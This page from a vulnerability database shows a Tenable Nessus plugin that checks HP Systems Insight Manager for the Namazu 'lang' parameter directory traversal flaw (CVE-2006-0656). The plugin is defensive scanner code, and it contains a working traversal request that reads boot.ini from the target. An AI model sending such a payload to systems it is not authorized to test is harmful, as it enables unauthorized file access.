Lucene search

K
nessusThis script is Copyright (C) 2006-2022 Tenable Network Security, Inc.HPSIM_NAMAZU_LANG_DIR_TRAVERSAL.NASL
HistoryFeb 13, 2006 - 12:00 a.m.

HP Systems Insight Manager Namazu lang Parameter Traversal Arbitrary File Access

2006-02-1300:00:00
This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.
www.tenable.com
57

The remote host appears to be running HP Systems Insight Manager (SIM), a unified infrastructure management tool.

The version of HP SIM on the remote host includes a version of the search engine Namazu that reportedly fails to validate user input to the ‘lang’ parameter of the ‘namazucgi’ script. An unauthenticated attacker may be able to exploit this issue to access files on the remote host via directory traversal.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(20893);
  script_version("1.24");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-0656");
  script_bugtraq_id(16571);

  script_name(english:"HP Systems Insight Manager Namazu lang Parameter Traversal Arbitrary File Access");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that is affected by a
directory traversal flaw.");
  script_set_attribute(attribute:"description", value:
"The remote host appears to be running HP Systems Insight Manager
(SIM), a unified infrastructure management tool. 

The version of HP SIM on the remote host includes a version of the
search engine Namazu that reportedly fails to validate user input to
the 'lang' parameter of the 'namazucgi' script.  An unauthenticated
attacker may be able to exploit this issue to access files on the
remote host via directory traversal.");
  script_set_attribute(attribute:"see_also", value:"http://www.securityfocus.com/advisories/10104");
  script_set_attribute(attribute:"solution", value:
"Update HP SIM's .namazurc configuration file according to the vendor
advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/02/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2006/02/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/02/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:systems_insight_manager");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "web_traversal.nasl");
  script_require_ports("Services/www", 50000, 50001);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:50000);
if ( get_kb_item(strcat("www/", port, "/generic_traversal"))) exit(0);



# Try to exploit the flaw to read a file.
file = "/../../../../../../../../../../../../../boot.ini";
url = string(
    "/mxhelp/cgi-bin/namazucgi?",
    "lang=", file
  );
r = http_send_recv3(method: "GET", port:port, item: url);
if (isnull(r)) exit(0);
res = r[2];
# There's a problem if looks like boot.ini.
if ("[boot loader]">< res) {
  contents = res - strstr(res, "<h2>Results:");

  if (isnull(contents)) report = desc;
  else {
    report = string(
      "Here are the contents of the file '\\boot.ini' that\n",
      "Nessus was able to read from the remote host \n",
      " by reading ", build_url(port: port, qs: url), " : \n",
      "\n",
      contents
    );
  }

  security_warning(port:port, extra:report);
}
VendorProductVersionCPE
hpsystems_insight_managercpe:/a:hp:systems_insight_manager
Related for HPSIM_NAMAZU_LANG_DIR_TRAVERSAL.NASL